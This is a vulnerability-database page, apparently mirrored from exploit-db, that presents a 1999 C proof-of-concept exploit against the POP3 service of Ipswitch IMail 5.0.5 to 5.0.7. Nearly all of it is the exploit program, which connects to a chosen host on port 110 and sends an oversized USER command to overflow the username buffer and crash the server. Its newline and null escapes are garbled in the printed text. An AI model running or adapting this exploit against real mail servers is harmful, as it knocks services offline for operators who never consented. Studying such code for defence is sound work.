Ipswitch IMail 5.0.5/5.0.6/5.0.7 – POP3 Denial of Service / Buffer Overflow (PoC)

Ipswitch IMail 5.0.5/5.0.6/5.0.7 – POP3 Denial of Service / Buffer Overflow (PoC)

漏洞ID 1053425 漏洞类型
发布时间 1999-11-08 更新时间 1999-11-08
图片[1]-Ipswitch IMail 5.0.5/5.0.6/5.0.7 – POP3 Denial of Service / Buffer Overflow (PoC)-安全小百科CVE编号 N/A
图片[2]-Ipswitch IMail 5.0.5/5.0.6/5.0.7 – POP3 Denial of Service / Buffer Overflow (PoC)-安全小百科CNNVD-ID N/A
漏洞平台 Windows CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19616
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
/*
source: http://www.securityfocus.com/bid/789/info

There is a buffer overflow in the username field when the username is between 200 and 500 characters. Although it may be possible to execute arbitrary code on the vulnerable server, current exploits only cause a denial of service on the remote machine. 

Exploit (by Interrupt):
*/

/*
 * IMAIL 5.07 POP3 Overflow
 * By: [email protected]
 *
 * Demonstrates vulnerability
 */


 #include <stdio.h>
 #include <string.h>


#ifdef WINDOWS
 #include <windows.h>
 #include <winsock.h>
#else
 #include <sys/types.h>
 #include <sys/socket.h>
 #include <netdb.h>
 #include <netinet/in.h>
#endif


#ifndef WINDOWS
 #define SOCKET_ERROR -1
 #define closesocket(sock) close(sock)
 #define WSACleanup() ;
#endif


char overflow[] =
 "USER AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAn";


int main(int argc, char *argv[])
{
#ifdef WINDOWS
   WSADATA wsaData;
#endif


   struct hostent *hp;
   struct sockaddr_in sockin;
   char buf[300], *check;
   int sockfd, bytes;
   char *hostname;
   unsigned short port;


   if (argc <= 1)
   {
      printf("IMAIL POP3 Overflown");
      printf("By: [email protected]");


      printf("Usage: %s [hostname] [port]n", argv[0]);
      printf("If port is not specified we use '110'n");


      exit(0);
   }


   hostname = argv[1];
   if (argv[2]) port = atoi(argv[2]);
   else port = atoi("110");


   printf("IMAIL POP3 Overflown");
   printf("By: [email protected]");


#ifdef WINDOWS
   if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
   {
      fprintf(stderr, "Error setting up with WinSock v1.1n");
      exit(-1);
   }
#endif


   hp = gethostbyname(hostname);
   if (hp == NULL)
   {
      printf("ERROR: Uknown host %sn", hostname);
      exit(-1);
   }


   sockin.sin_family = hp->h_addrtype;
   sockin.sin_port = htons(port);
   sockin.sin_addr = *((struct in_addr *)hp->h_addr);


   if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Socket Errorn");
      exit(-1);
   }


   if ((connect(sockfd, (struct sockaddr *) &sockin,
                sizeof(sockin))) == SOCKET_ERROR)
   {
      printf("ERROR: Connect Errorn");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }


   printf("Connected to [%s] on port [%d], sending overflow....n",
          hostname, port);


   /* Check to see if we get a +OK error code. If so then proceed. */
   if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
   {
      printf("ERROR: Recv Errorn");
      closesocket(sockfd);
      WSACleanup();
      exit(1);
   }


   buf[bytes] = '';
   check = strstr(buf, "+OK");
   if (check == NULL)
   {
      printf("ERROR: NO +OK response from inital connectn");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }


   if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
   {
      printf("ERROR: Send Errorn");
      closesocket(sockfd);
      WSACleanup();
      exit(-1);
   }


   printf("Sent.n");


   closesocket(sockfd);
   WSACleanup();
}

相关推荐: Digital UNIX SUID/SGID Core File Vulnerability

Digital UNIX SUID/SGID Core File Vulnerability 漏洞ID 1104996 漏洞类型 Unknown 发布时间 1998-04-06 更新时间 1998-04-06 CVE编号 N/A CNNVD-ID N/A 漏洞…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享